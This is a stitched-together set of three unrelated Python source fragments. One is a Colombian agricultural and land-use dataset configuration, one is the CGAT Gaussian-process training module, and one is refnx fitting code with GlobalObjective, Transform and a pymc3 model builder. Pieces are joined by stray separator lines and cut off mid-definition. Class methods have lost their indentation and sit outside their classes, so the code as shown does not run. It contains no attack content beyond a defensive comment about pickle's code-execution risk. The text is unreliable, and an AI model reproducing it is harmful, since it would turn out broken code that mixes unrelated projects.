    in_range = df.year.between(YEAR_MIN_AGPRODUCT, YEAR_MAX_AGPRODUCT)
    return df[in_range]
# Per-level agproduct configs: country codes are 3 chars ("COL"),
# department codes 2 digits.
agproduct_level3_country = copy.deepcopy(agproduct_template)
agproduct_level3_country["read_function"] = read_agproduct_level3_country
agproduct_level3_country["hook_pre_merge"] = hook_agproduct
agproduct_level3_country["classification_fields"]["location"]["level"] = "country"
agproduct_level3_country["digit_padding"]["location"] = 3

agproduct_level3_department = copy.deepcopy(agproduct_template)
agproduct_level3_department["read_function"] = lambda: pd.read_stata(prefix_path("Rural/agric_2007_2015_dept_final_2.dta"))
agproduct_level3_department["hook_pre_merge"] = hook_agproduct
agproduct_level3_department["classification_fields"]["location"]["level"] = "department"
agproduct_level3_department["digit_padding"]["location"] = 2
agproduct_level3_municipality = copy.deepcopy(agproduct_template)
agproduct_level3_municipality["read_function"] = lambda: pd.read_stata(prefix_path("Rural/agric_2007_2015_muni_final_2.dta"))
agproduct_level3_municipality["hook_pre_merge"] = hook_agproduct
agproduct_level3_municipality["classification_fields"]["location"]["level"] = "municipality"
# Fix: was 3, but municipality codes are 5 digits everywhere else in this
# module (industry4digit_municipality, livestock_level1_municipality,
# land_use_level2_municipality all pad location to 5).
agproduct_level3_municipality["digit_padding"]["location"] = 5
def hook_land_use(df):
    # Keep only level2 rows of the land-use hierarchy.
    df = df[df.land_use_level == "level2"]
    # NOTE(review): '\x92' is the cp1252 right single quote; the replacement
    # text 'Â’' looks mojibake-encoded itself (UTF-8 bytes of '’' read back
    # as latin-1). Presumably this matches how the classification table is
    # encoded so the merge succeeds — confirm before changing.
    df["land_use"] = df["land_use"].str.replace('\x92', 'Â’')
    return df
# Shared template for the land-use datasets; per-level configs below are
# deep copies with read_function / classification level / padding filled in.
land_use_template = {
    "read_function": None,
    "hook_pre_merge": hook_land_use,
    "field_mapping": {
        "location_id": "location",
        "land_use_type_name_sp": "land_use",
        "land_use_level": "land_use_level",
        "land_use_ha": "area",
    },
    "classification_fields": {
        "land_use": {
            "classification": land_use_classification,
            "level": "level2",
        },
        "location": {
            "classification": location_classification,
            # Filled in per level.
            "level": None,
        },
    },
    "digit_padding": {
        # Filled in per level.
        "location": None,
    },
    "facet_fields": ["location", "land_use"],
    "facets": {
        ("location_id", "land_use_id"): {
            "area": first,
        }
    }
}
def read_land_use_level2_country():
    """Load the national land-use Stata file and tag every row as Colombia."""
    country_df = pd.read_stata(prefix_path("Rural/land_use_Col_c.dta"))
    country_df["location_id"] = "COL"
    return country_df
# Country-level land use: single national file, location hard-coded to "COL".
land_use_level2_country = copy.deepcopy(land_use_template)
land_use_level2_country["read_function"] = read_land_use_level2_country
land_use_level2_country["classification_fields"]["location"]["level"] = "country"
land_use_level2_country["digit_padding"]["location"] = 3
# Department-level land use (2-digit department codes).
land_use_level2_department = copy.deepcopy(land_use_template)
land_use_level2_department["read_function"] = lambda: pd.read_stata(prefix_path("Rural/land_use_dept_c.dta"))
land_use_level2_department["classification_fields"]["location"]["level"] = "department"
land_use_level2_department["digit_padding"]["location"] = 2
# Municipality-level land use (5-digit department+municipality codes).
land_use_level2_municipality = copy.deepcopy(land_use_template)
land_use_level2_municipality["read_function"] = lambda: pd.read_stata(prefix_path("Rural/land_use_muni_c.dta"))
# NOTE(review): redundant — the template already sets hook_pre_merge to
# hook_land_use; harmless but could be dropped.
land_use_level2_municipality["hook_pre_merge"] = hook_land_use
land_use_level2_municipality["classification_fields"]["location"]["level"] = "municipality"
land_use_level2_municipality["digit_padding"]["location"] = 5
def hook_farmtype(df):
    """Restrict the farm-type dataset to level-2 classification rows."""
    return df[df.farmtype_level == "level2"]
farmtype_template = {
"read_function": None,
"hook_pre_merge": hook_farmtype,
"field_mapping": {
"location_id": "location",
"farms_types_name": "farmtype",
"farms_level": "farmtype_level",
| |
# CGAT/gaussian_process.py (repository: noah-hoffmann/CGAT)
import gpytorch
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader, TensorDataset
from torch.nn.functional import l1_loss as mae
from torch.nn.functional import mse_loss as mse
from .lightning_module import LightningModel, collate_fn, collate_batch
from pytorch_lightning.core import LightningModule
from torch_geometric.data import Batch
from .data import CompositionData
from .utils import cyclical_lr
from glob import glob
import os
from argparse import ArgumentParser
import datetime
import itertools
from sklearn.model_selection import train_test_split as split
from pytorch_lightning import Trainer
from pytorch_lightning.loggers.tensorboard import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
import pickle
import gzip as gz
def EmbeddingData(data, target='e_above_hull_new'):
    """Build a :class:`TensorDataset` of (embedding, target) pairs.

    Parameters
    ----------
    data : str or dict
        Path to a gzipped pickle file, or an already-loaded dict with an
        ``'input'`` array of embeddings and a ``'target'`` mapping of
        property name -> values.
    target : str
        Key of the property to predict inside ``data['target']``.

    Returns
    -------
    torch.utils.data.TensorDataset
    """
    if isinstance(data, str):
        # SECURITY NOTE: pickle.load executes arbitrary code — only use
        # with trusted files.  Context manager closes the file handle
        # (the previous version leaked it).
        with gz.open(data) as fh:
            data = pickle.load(fh)
    # renamed from `input`/`target` to avoid shadowing the builtin and
    # the `target` parameter
    inputs = torch.Tensor(data['input'])
    targets = torch.Tensor(data['target'][target])
    return TensorDataset(inputs, targets)
class GPModel(gpytorch.models.ApproximateGP):
    """Sparse variational GP over CGAT graph embeddings.

    Uses a Cholesky variational distribution over the supplied inducing
    points and wraps the chosen kernel in a ScaleKernel.
    """

    def __init__(self, inducing_points: torch.Tensor, *,
                 mean_module=gpytorch.means.ConstantMean,
                 covar_module=gpytorch.kernels.RBFKernel):
        """
        Parameters
        ----------
        inducing_points : torch.Tensor
            Initial inducing-point locations; the variational
            distribution is sized from ``inducing_points.size(0)``.
        mean_module : callable
            Zero-argument factory for the mean module (class, not instance).
        covar_module : callable
            Zero-argument factory for the base kernel (class, not instance).
        """
        # init base class: variational distribution + strategy over the
        # inducing points must exist before super().__init__
        distribution = gpytorch.variational.CholeskyVariationalDistribution(inducing_points.size(0))
        strategy = gpytorch.variational.VariationalStrategy(self, inducing_points, distribution)
        super(GPModel, self).__init__(strategy)
        # init mean and covariance modules
        self.mean_module = mean_module()
        self.covar_module = gpytorch.kernels.ScaleKernel(covar_module())
        # init likelihood (kept on the model so it is saved/optimized together)
        self.likelihood = gpytorch.likelihoods.GaussianLikelihood()

    def forward(self, batch):
        """Return the GP prior MultivariateNormal for *batch* inputs."""
        # calculate means and covariances of the batch
        mean = self.mean_module(batch)
        covar = self.covar_module(batch)
        # return distribution
        return gpytorch.distributions.MultivariateNormal(mean, covar)

    def parameters(self, recurse: bool = True):
        """Model parameters chained with the likelihood's parameters.

        NOTE(review): if ``self.likelihood`` is registered as a submodule
        (it is assigned in ``__init__`` of an nn.Module), its parameters
        may already be included by ``super().parameters()`` and would be
        yielded twice here — confirm against gpytorch's module behavior.
        """
        return itertools.chain(super().parameters(recurse),
                               self.likelihood.parameters(recurse))
class GLightningModel(LightningModule):
def __init__(self, hparams):
    """Set up datasets, normalization, inducing points and the GP.

    Parameters
    ----------
    hparams : argparse.Namespace or dict
        Hyperparameters (see ``add_model_specific_args``).  Key fields
        read here: ``cgat_model``, ``train``, ``data_path``,
        ``test_path``/``val_path``, ``target``, split sizes/seed,
        ``inducing_points``, ``zero_mean``.
    """
    super().__init__()
    # initialization of mean and standard deviation of the target data
    # (registered as non-trainable Parameters so they are persisted in
    # checkpoints and restored without recalculation)
    self.mean = nn.parameter.Parameter(torch.zeros(1), requires_grad=False)
    self.std = nn.parameter.Parameter(torch.zeros(1), requires_grad=False)
    self.save_hyperparameters(hparams)
    # loading of cgat model (needed for calculating the embeddings);
    # when absent, inputs are assumed to be precomputed embeddings
    if self.hparams.cgat_model is not None:
        self.cgat_model = LightningModel.load_from_checkpoint(self.hparams.cgat_model, train=False)
        self.cgat_model.eval()
        # NOTE(review): .cuda() hard-codes GPU usage — this path fails on
        # CPU-only hosts; confirm intended.
        self.cgat_model.cuda()
        # embedding width is determined by the CGAT architecture
        embedding_dim = self.cgat_model.hparams.atom_fea_len * self.cgat_model.hparams.msg_heads
        self.hparams.embedding_dim = embedding_dim
    else:
        self.cgat_model = None
    # datasets are loaded for training or testing; not needed in production
    if self.hparams.train:
        datasets = []
        if self.cgat_model is not None:
            # used for single file
            try:
                dataset = CompositionData(
                    data=self.hparams.data_path,
                    fea_path=self.hparams.fea_path,
                    max_neighbor_number=self.hparams.max_nbr,
                    target=self.hparams.target)
                print(self.hparams.data_path + ' loaded')
            # used for folder of dataset files (CompositionData raises
            # AssertionError when given a directory)
            except AssertionError:
                f_n = sorted([file for file in glob(os.path.join(self.hparams.data_path, "*.pickle.gz"))])
                print("{} files to load".format(len(f_n)))
                for file in f_n:
                    try:
                        datasets.append(CompositionData(
                            data=file,
                            fea_path=self.hparams.fea_path,
                            max_neighbor_number=self.hparams.max_nbr,
                            target=self.hparams.target))
                        print(file + ' loaded')
                    except AssertionError:
                        print(file + ' could not be loaded')
                print("{} files succesfully loaded".format(len(datasets)))
                dataset = torch.utils.data.ConcatDataset(datasets)
        else:
            # precomputed-embedding path: file vs directory handled explicitly
            if os.path.isfile(self.hparams.data_path):
                dataset = EmbeddingData(
                    data=self.hparams.data_path,
                    target=self.hparams.target
                )
                print(self.hparams.data_path + ' loaded')
            elif os.path.isdir(self.hparams.data_path):
                dataset = torch.utils.data.ConcatDataset([
                    EmbeddingData(
                        data=file,
                        target=self.hparams.target
                    )
                    for file in glob(os.path.join(self.hparams.data_path, '*.pickle.gz'))])
            else:
                raise ValueError(f"{self.hparams.data_path!r} is neither a file nor an existing directory!")
            # infer embedding width from the first sample
            self.hparams.embedding_dim = len(dataset[0][0])
        # if either explicit split path is missing, fall back to a random
        # train/test/val split of the single dataset
        if self.hparams.test_path is None or self.hparams.val_path is None:
            indices = list(range(len(dataset)))
            train_idx, test_idx = split(indices, random_state=self.hparams.seed,
                                        test_size=self.hparams.test_size)
            train_set = torch.utils.data.Subset(dataset, train_idx)
            self.test_set = torch.utils.data.Subset(dataset, test_idx)
            indices = list(range(len(train_set)))
            # rescale val_size so it is a fraction of the remaining data
            train_idx, val_idx = split(indices, random_state=self.hparams.seed,
                                       test_size=self.hparams.val_size / (1 - self.hparams.test_size))
            train_set_2 = torch.utils.data.Subset(train_set, train_idx)
            self.val_subset = torch.utils.data.Subset(train_set, val_idx)
        else:
            # explicit test/val directories were supplied
            if self.cgat_model is not None:
                test_data = torch.utils.data.ConcatDataset([CompositionData(data=file,
                                                                            fea_path=self.hparams.fea_path,
                                                                            max_neighbor_number=self.hparams.max_nbr,
                                                                            target=self.hparams.target)
                                                            for file in glob(
                        os.path.join(self.hparams.test_path, "*.pickle.gz"))])
                val_data = torch.utils.data.ConcatDataset([CompositionData(data=file,
                                                                           fea_path=self.hparams.fea_path,
                                                                           max_neighbor_number=self.hparams.max_nbr,
                                                                           target=self.hparams.target)
                                                           for file in glob(
                        os.path.join(self.hparams.val_path, "*.pickle.gz"))])
            else:
                test_data = torch.utils.data.ConcatDataset([EmbeddingData(data=file,
                                                                          target=self.hparams.target)
                                                            for file in glob(
                        os.path.join(self.hparams.test_path, '*.pickle.gz'))])
                val_data = torch.utils.data.ConcatDataset([EmbeddingData(data=file,
                                                                         target=self.hparams.target)
                                                           for file in glob(
                        os.path.join(self.hparams.val_path, '*.pickle.gz'))])
            train_set = dataset
            self.test_set = test_data
            train_set_2 = train_set
            self.val_subset = val_data
        # Use train_percentage to get errors for different training set sizes
        # but same test and validation sets
        if self.hparams.train_percentage != 0.0:
            indices = list(range(len(train_set_2)))
            train_idx, rest_idx = split(
                indices, random_state=self.hparams.seed, test_size=1.0 - self.hparams.train_percentage / (
                        1 - self.hparams.val_size - self.hparams.test_size))
            self.train_subset = torch.utils.data.Subset(train_set_2, train_idx)
        else:
            self.train_subset = train_set_2
        self.hparams.train_size = len(self.train_subset)
        # compute target mean/std over the training subset only
        print('Normalization started')
        if self.cgat_model is not None:
            # graph datasets yield (data, comp) pairs; target lives on data.y
            def collate_fn2(data_list):
                return [el[0].y for el in data_list]
        else:
            # embedding datasets yield (x, y) pairs
            def collate_fn2(data_list):
                return [y for x, y in data_list]
        sample_target = torch.cat(collate_fn2(self.train_subset))
        self.mean = nn.parameter.Parameter(torch.mean(sample_target, dim=0, keepdim=False).reshape((-1,)),
                                           requires_grad=False)
        self.std = nn.parameter.Parameter(torch.std(sample_target, dim=0, keepdim=False).reshape((-1,)),
                                          requires_grad=False)
        print('mean: ', self.mean.item(), 'std: ', self.std.item())
        print('normalization ended')
    # placeholder for inducing points; overwritten below when training,
    # restored from checkpoint otherwise
    self.inducing_points = nn.parameter.Parameter(torch.zeros((self.hparams.inducing_points,
                                                               self.hparams.embedding_dim)),
                                                  requires_grad=False)
    if self.hparams.train:
        if self.cgat_model is not None:
            print('Calculating embedding of inducing points')
            # one shuffled batch of size `inducing_points` seeds the GP
            loader = DataLoader(self.train_subset, batch_size=self.hparams.inducing_points, shuffle=True,
                                collate_fn=collate_fn)
            batch = next(iter(loader))
            del loader
            with torch.no_grad():
                self.inducing_points = nn.parameter.Parameter(
                    self.cgat_model.evaluate(batch, return_graph_embedding=True), requires_grad=False)
        else:
            loader = DataLoader(self.train_subset, batch_size=self.hparams.inducing_points, shuffle=True)
            inducing_points, _ = next(iter(loader))
            del loader
            self.inducing_points = nn.parameter.Parameter(inducing_points, requires_grad=False)
        print('Done')
    if self.hparams.zero_mean:
        self.model = GPModel(self.inducing_points, mean_module=gpytorch.means.ZeroMean)
    else:
        self.model = GPModel(self.inducing_points)
    # variational ELBO is the training loss (only needed when fitting)
    self.criterion = gpytorch.mlls.VariationalELBO(self.model.likelihood, self.model, self.hparams.train_size)
def norm(self, tensor):
    """Standardize *tensor* with the target mean/std stored on the model."""
    centered = tensor - self.mean
    return centered / self.std
def denorm(self, normed_tensor):
    """Invert :meth:`norm`: map standardized values back to target units."""
    return self.std * normed_tensor + self.mean
def evaluate(self, batch):
    """Run the GP on a batch and return predictions with uncertainty.

    Parameters
    ----------
    batch : list of (graph, comp) pairs, (embeddings, targets) list, or
        a bare embedding tensor (production mode, targets unknown).

    Returns
    -------
    tuple
        ``(output, (lower, upper), pred, target, target_norm)`` —
        the raw MultivariateNormal, denormalized confidence bounds,
        denormalized predictions, and flattened (raw, normalized) targets.
    """
    if self.cgat_model is not None:
        # graph path: embed the structures with the frozen CGAT model
        with torch.no_grad():
            embeddings = self.cgat_model.evaluate(batch, return_graph_embedding=True)
        device = next(self.model.parameters()).device
        # split (graph, comp) pairs; b_comp is unused here but the
        # unpacking mirrors collate_fn's output layout
        b_comp, batch = [el[1] for el in batch], [el[0] for el in batch]
        batch = (Batch.from_data_list(batch)).to(device)
        target = batch.y.view(len(batch.y), 1)
    else:
        if isinstance(batch, list):
            embeddings, target = batch
        else:
            # bare embeddings: no ground truth available, use zeros so the
            # downstream code still runs (target values are meaningless)
            embeddings = batch
            target = torch.zeros(embeddings.shape[0])
    target_norm = self.norm(target)
    output = self.model(embeddings)
    pred = self.denorm(output.mean)
    # confidence_region() is in normalized space; denormalize the bounds
    lower, upper = output.confidence_region()
    return output, (self.denorm(lower), self.denorm(upper)), pred, target.flatten(), target_norm.flatten()
def forward(self, batch):
    """Return only the denormalized predictions for *batch*."""
    return self.evaluate(batch)[2]
def training_step(self, batch, batch_idx):
    """One training step: negative ELBO loss plus MAE/RMSE metrics.

    Returns the loss tensor for the optimizer.
    """
    output, _, pred, target, target_norm = self.evaluate(batch)
    loss = -self.criterion(output, target_norm)
    metrics = {
        'train_loss': loss,
        'train_mae': mae(pred, target),
        'train_rmse': mse(pred, target).sqrt(),
    }
    for name, value in metrics.items():
        self.log(name, value, on_step=False, on_epoch=True, sync_dist=True)
    return loss
def validation_step(self, batch, batch_idx):
    """Log validation loss, MAE and RMSE for one batch.

    Args:
        batch: Tuple of graph object from pytorch geometric and input for Roost
        batch_idx: identifiers of batch elements
    """
    output, _, pred, target, target_norm = self.evaluate(batch)
    for name, value in (('val_loss', -self.criterion(output, target_norm)),
                        ('val_mae', mae(pred, target)),
                        ('val_rmse', mse(pred, target).sqrt())):
        self.log(name, value, on_epoch=True, sync_dist=True)
def test_step(self, batch, batch_idx):
    """Log test loss, MAE and RMSE for one batch.

    Args:
        batch: Tuple of graph object from pytorch geometric and input for Roost
        batch_idx: identifiers of batch elements
    """
    output, _, pred, target, target_norm = self.evaluate(batch)
    for name, value in (('test_loss', -self.criterion(output, target_norm)),
                        ('test_mae', mae(pred, target)),
                        ('test_rmse', mse(pred, target).sqrt())):
        self.log(name, value, on_epoch=True, sync_dist=True)
def configure_optimizers(self):
    """Build the optimizer and LR scheduler from the hyperparameters.

    Returns
    -------
    ([optimizer], [scheduler])
        Lists as expected by pytorch-lightning.

    Raises
    ------
    NameError
        If ``--optim`` is not one of SGD, Adam, AdamW.
    """
    trainable = self.parameters()
    common = dict(lr=self.hparams.learning_rate,
                  weight_decay=self.hparams.weight_decay)
    if self.hparams.optim == "SGD":
        optimizer = optim.SGD(trainable,
                              momentum=self.hparams.momentum,
                              **common)
    elif self.hparams.optim == "Adam":
        optimizer = optim.Adam(trainable, **common)
    elif self.hparams.optim == "AdamW":
        optimizer = optim.AdamW(trainable, **common)
    else:
        raise NameError(
            "Only SGD, Adam, AdamW are allowed as --optim")
    if self.hparams.clr:
        # cyclical learning rate schedule
        scheduler = optim.lr_scheduler.LambdaLR(
            optimizer,
            [cyclical_lr(period=self.hparams.clr_period,
                         cycle_mul=0.1,
                         tune_mul=0.05, )])
    else:
        # decay LR when the monitored metric plateaus
        scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,
                                                         mode='min',
                                                         factor=0.1,
                                                         patience=5,
                                                         verbose=False,
                                                         threshold=0.0002,
                                                         threshold_mode='rel',
                                                         cooldown=0,
                                                         eps=1e-08)
    return [optimizer], [scheduler]
def train_dataloader(self):
    """Build the training DataLoader from the hyperparameters.

    Returns
    -------
    DataLoader
        Shuffled loader over the training subset; graph collation is
        only used when a CGAT model provides the embeddings.
    """
    print('length of train_subset: {}'.format(len(self.train_subset)))
    collate = collate_fn if self.cgat_model is not None else None
    return DataLoader(self.train_subset,
                      collate_fn=collate,
                      batch_size=self.hparams.batch_size,
                      num_workers=self.hparams.workers,
                      pin_memory=False,
                      shuffle=True,
                      drop_last=True)
def val_dataloader(self):
    """Build the validation DataLoader from the hyperparameters.

    Returns
    -------
    DataLoader
        Unshuffled loader over the validation subset (num_workers left
        at its default).
    """
    collate = collate_fn if self.cgat_model is not None else None
    loader = DataLoader(self.val_subset,
                        collate_fn=collate,
                        batch_size=self.hparams.batch_size,
                        pin_memory=False,
                        drop_last=True,
                        shuffle=False)
    print('length of val_subset: {}'.format(len(self.val_subset)))
    return loader
def test_dataloader(self):
    """Build the test DataLoader from the hyperparameters.

    Returns
    -------
    DataLoader
        Unshuffled loader over the held-out test set (num_workers left
        at its default).
    """
    collate = collate_fn if self.cgat_model is not None else None
    loader = DataLoader(self.test_set,
                        collate_fn=collate,
                        batch_size=self.hparams.batch_size,
                        pin_memory=False,
                        drop_last=True,
                        shuffle=False)
    print('length of test_subset: {}'.format(len(self.test_set)))
    return loader
@staticmethod
def add_model_specific_args(parent_parser: ArgumentParser = None) -> ArgumentParser: # pragma: no-cover
"""
Parameters defined here will be available through self.hparams
Args:
parent_parser: ArgumentParser from e.g. the training script that adds gpu settings and Trainer settings
Returns:
parser: ArgumentParser for all hyperparameters and training/test settings
"""
if parent_parser is not None:
parser = ArgumentParser(parents=[parent_parser])
else:
parser = ArgumentParser()
parser.add_argument("--data-path",
type=str,
default="data/",
metavar="PATH",
help="path to folder/file that contains dataset files, tries to load all "
"*.pickle.gz in folder")
parser.add_argument("--fea-path",
type=str,
default="../embeddings/matscholar-embedding.json",
metavar="PATH",
help="atom feature path")
parser.add_argument("--max-nbr",
default=24,
type=int,
metavar="max_N",
help="num of neighbors maximum depends on the number | |
lw=0,
elinewidth=2,
)
else:
ax.scatter(self.data.x, y, color="blue", s=3, label=self.data.name)
if samples > 0:
saved_params = np.array(self.parameters)
# Get a number of chains, chosen randomly, set the objective,
# and plot the model.
for pvec in self.pgen(ngen=samples):
y, y_err, model = self._data_transform(
model=self.generative(pvec)
)
ax.plot(self.data.x, model, color="k", alpha=0.01)
# put back saved_params
self.setp(saved_params)
# add the fit
generative_plot = ax.plot(self.data.x, model, color="red", zorder=20)
if parameter is None:
return fig, ax
# create an interactive plot in a Jupyter notebook.
def f(val):
if parameter is not None:
parameter.value = float(val)
y, y_err, model = self._data_transform(model=self.generative())
generative_plot[0].set_data(self.data.x, model)
fig.canvas.draw()
import ipywidgets
return fig, ax, ipywidgets.interact(f, val=float(parameter))
def corner(self, **kwds):
    """
    Corner plot of the chains belonging to the Parameters.
    Requires the `corner` and `matplotlib` packages.

    Parameters
    ----------
    kwds: dict
        passed directly to the `corner.corner` function

    Returns
    -------
    fig : :class:`matplotlib.Figure` object.
    """
    import corner

    params = self.varying_parameters()
    # stack each parameter's chain into a row, then flatten each chain
    # and transpose to shape (nsamples, nparameters)
    samples = np.array([p.chain for p in params])
    samples = samples.reshape(len(samples), -1).T
    kwds["labels"] = [p.name for p in params]
    kwds["quantiles"] = [0.16, 0.5, 0.84]
    return corner.corner(samples, **kwds)
class GlobalObjective(Objective):
    """
    Global Objective function for simultaneous fitting with
    `refnx.analysis.CurveFitter`

    Parameters
    ----------
    objectives : list
        list of :class:`refnx.analysis.Objective` objects

    Raises
    ------
    ValueError
        If the objectives mix weighted and unweighted datasets.
    """

    def __init__(self, objectives):
        self.objectives = objectives
        # all objectives must agree on weighting so log-likelihoods are
        # comparable when summed
        weighted = [objective.weighted for objective in objectives]
        self._weighted = np.array(weighted, dtype=bool)
        if len(np.unique(self._weighted)) > 1:
            raise ValueError(
                "All the objectives must be either weighted or"
                " unweighted, you cannot have a mixture."
            )

    def __str__(self):
        s = ["{:_>80}".format("\n")]
        s.append("--Global Objective--")
        for obj in self.objectives:
            s.append(str(obj))
            s.append("\n")
        return "\n".join(s)

    def __repr__(self):
        return "GlobalObjective({0})".format(repr(self.objectives))

    @property
    def weighted(self):
        """
        **bool** do all the datasets have y_err, and are all the objectives
        wanting to use weights?
        """
        return self._weighted.all()

    @property
    def npoints(self):
        """
        **int** total number of data points across all the objectives.
        """
        npoints = 0
        for objective in self.objectives:
            npoints += objective.npoints
        return npoints

    def residuals(self, pvals=None):
        """
        Concatenated residuals for each of the
        :meth:`refnx.analysis.Objective.residuals`.

        Parameters
        ----------
        pvals : array-like or refnx.analysis.Parameters
            values for the varying or entire set of parameters

        Returns
        -------
        residuals : np.ndarray
            Concatenated :meth:`refnx.analysis.Objective.residuals`
        """
        self.setp(pvals)
        residuals = []
        for objective in self.objectives:
            residual = objective.residuals()
            residuals.append(residual)
        return np.concatenate(residuals)

    @property
    def parameters(self):
        """
        :class:`refnx.analysis.Parameters` associated with all the objectives.
        """
        # TODO this is probably going to be slow.
        # cache and update strategy?
        p = Parameters(name="global fitting parameters")
        for objective in self.objectives:
            p.append(objective.parameters)
        return p

    def logp(self, pvals=None):
        """
        Calculate the log-prior of the system

        Parameters
        ----------
        pvals : array-like or refnx.analysis.Parameters, optional
            values for the varying or entire set of parameters

        Returns
        -------
        logp : float
            log-prior probability
        """
        self.setp(pvals)
        logp = 0.0
        for objective in self.objectives:
            logp += objective.logp()
            # shortcut if one of the priors is impossible
            if not np.isfinite(logp):
                return -np.inf
        return logp

    def logl(self, pvals=None):
        """
        Calculate the log-likelihood of the system

        Parameters
        ----------
        pvals : array-like or refnx.analysis.Parameters
            values for the varying or entire set of parameters

        Returns
        -------
        logl : float
            log-likelihood probability
        """
        self.setp(pvals)
        logl = 0.0
        for objective in self.objectives:
            logl += objective.logl()
        return logl

    def plot(self, pvals=None, samples=0, parameter=None, fig=None):
        """
        Plot the data/model for all the objectives in the GlobalObjective.
        Matplotlib must be installed to use this method.

        Parameters
        ----------
        pvals : np.ndarray, optional
            Numeric values for the Parameter's that are varying
        samples: number, optional
            If the objective has been sampled, how many samples you wish to
            plot on the graph.
        parameter: refnx.analysis.Parameter, optional
            Creates an interactive plot for the Parameter in Jupyter. Requires
            ipywidgets be installed. Use with %matplotlib notebook/qt.
        fig: Figure instance, optional
            If `fig` is not supplied then a new figure is created. Otherwise
            the graph is created on the current axes on the supplied figure.

        Returns
        -------
        fig, ax : :class:`matplotlib.Figure`, :class:`matplotlib.Axes`
            `matplotlib` figure and axes objects.
        """
        self.setp(pvals)

        if fig is None:
            import matplotlib.pyplot as plt

            fig = plt.figure()
            ax = fig.add_subplot(111)
        else:
            ax = fig.gca()

        generative_plots = []

        if samples > 0:
            # snapshot the current parameter values so sampling does not
            # permanently change the objective state
            saved_params = np.array(self.parameters)

            # Get a number of chains, chosen randomly, set the objectives,
            # and plot the model.
            for pvec in self.pgen(ngen=samples):
                self.setp(pvec)

                for objective in self.objectives:
                    y, y_err, model = objective._data_transform(
                        model=objective.generative()
                    )
                    ax.plot(objective.data.x, model, color="k", alpha=0.01)

            # put back saved_params
            self.setp(saved_params)

        for objective in self.objectives:
            # add the data (in a transformed fashion)
            y, y_err, model = objective._data_transform(
                model=objective.generative()
            )

            if objective.weighted:
                ax.errorbar(
                    objective.data.x,
                    y,
                    y_err,
                    label=objective.data.name,
                    ms=3,
                    lw=0,
                    elinewidth=2,
                    marker="o",
                )
            else:
                ax.scatter(objective.data.x, y, label=objective.data.name)

            # add the fit
            generative_plots.append(
                ax.plot(objective.data.x, model, color="r", lw=1.5, zorder=20)[
                    0
                ]
            )

        if parameter is None:
            return fig, ax

        # create an interactive plot in a Jupyter notebook.
        def f(val):
            if parameter is not None:
                parameter.value = float(val)
            for i, objective in enumerate(self.objectives):
                y, y_err, model = objective._data_transform(
                    model=objective.generative()
                )
                generative_plots[i].set_data(objective.data.x, model)
            fig.canvas.draw()

        import ipywidgets

        return fig, ax, ipywidgets.interact(f, val=float(parameter))

        # NOTE(review): unreachable — both branches above have returned
        # by this point; kept for byte-compatibility.
        return fig, ax
class Transform:
    r"""
    Mathematical transforms of numeric data.

    Parameters
    ----------
    form : None or str
        One of:

        - 'lin'
            No transform is made
        - 'logY'
            log10 transform
        - 'YX4'
            YX**4 transform
        - 'YX2'
            YX**2 transform
        - None
            No transform is made

    Notes
    -----
    You ask for a transform to be carried out by calling the Transform object
    directly.

    >>> x = np.linspace(0.01, 0.1, 11)
    >>> y = np.linspace(100, 1000, 11)
    >>> y_err = np.sqrt(y)
    >>> t = Transform('logY')
    >>> ty, te = t(x, y, y_err)
    >>> ty
    array([2.        , 2.2787536 , 2.44715803, 2.56820172, 2.66275783,
           2.74036269, 2.80617997, 2.86332286, 2.91381385, 2.95904139,
           3.        ])
    """

    def __init__(self, form):
        valid_forms = (None, "lin", "logY", "YX4", "YX2")
        if form not in valid_forms:
            raise ValueError(
                "The form parameter must be one of [None, 'lin',"
                " 'logY', 'YX4', 'YX2']"
            )
        self.form = form

    def __repr__(self):
        return "Transform({0})".format(repr(self.form))

    def __call__(self, x, y, y_err=None):
        """
        Calculate the transformed data

        Parameters
        ----------
        x : array-like
            x-values
        y : array-like
            y-values
        y_err : array-like
            Uncertainties in `y` (standard deviation)

        Returns
        -------
        yt, et : tuple
            The transformed data

        Examples
        --------
        >>> x = np.linspace(0.01, 0.1, 11)
        >>> y = np.linspace(100, 1000, 11)
        >>> y_err = np.sqrt(y)
        >>> t = Transform('logY')
        >>> ty, te = t(x, y, y_err)
        >>> ty
        array([2.        , 2.2787536 , 2.44715803, 2.56820172, 2.66275783,
               2.74036269, 2.80617997, 2.86332286, 2.91381385, 2.95904139,
               3.        ])
        """
        return self._apply(x, y, y_err=y_err)

    def _apply(self, x, y, y_err=None):
        r"""
        Transform (x, y, y_err) according to ``self.form``.

        Returns ``(yt, et)``; ``et`` is None when no ``y_err`` was given.
        """
        # dummy unit uncertainties keep the arithmetic uniform when no
        # y_err is supplied; they are discarded before returning
        err = np.ones_like(y) if y_err is None else y_err

        if self.form in ["lin", None]:
            yt = np.copy(y)
            et = np.copy(err)
        elif self.form == "logY":
            yt, et = EP.EPlog10(y, err)
            if not np.isfinite(yt).all():
                warnings.warn(
                    "Some of the transformed data was non-finite."
                    " Please check your datasets for points with zero or"
                    " negative values.",
                    RuntimeWarning,
                )
        else:
            # 'YX4' or 'YX2' (guaranteed by __init__ validation)
            exponent = 4 if self.form == "YX4" else 2
            yt = y * np.power(x, exponent)
            et = err * np.power(x, exponent)

        return (yt, None) if y_err is None else (yt, et)
def pymc3_model(objective):
    """
    Creates a pymc3 model from an Objective.

    Requires theano and pymc3 be installed. This is an experimental feature.

    Parameters
    ----------
    objective: refnx.analysis.Objective

    Returns
    -------
    model: pymc3.Model

    Notes
    -----
    The varying parameters are renamed 'p0', 'p1', etc, as it's vital in pymc3
    that all parameters have their own unique name.
    """
    import pymc3 as pm
    import theano.tensor as tt

    from refnx._lib._pymc3 import _LogLikeWithGrad

    basic_model = pm.Model()

    pars = objective.varying_parameters()
    wrapped_pars = []
    with basic_model:
        # Priors for unknown model parameters
        for i, par in enumerate(pars):
            name = "p%d" % i
            p = _to_pymc3_distribution(name, par)
            wrapped_pars.append(p)

        # Expected value of outcome
        try:
            # Likelihood (sampling distribution) of observations.
            # NOTE: objective.generative is passed as a callable, not
            # called — pymc3/theano may fail to autodiff through it,
            # which is what the except branch handles.
            pm.Normal(
                "y_obs",
                mu=objective.generative,
                sigma=objective.data.y_err,
                observed=objective.data.y,
            )
        except Exception:
            # Falling back, theano autodiff won't work on function object:
            # wrap the plain log-likelihood in an Op with a numeric gradient.
            theta = tt.as_tensor_variable(wrapped_pars)
            logl = _LogLikeWithGrad(objective.logl)
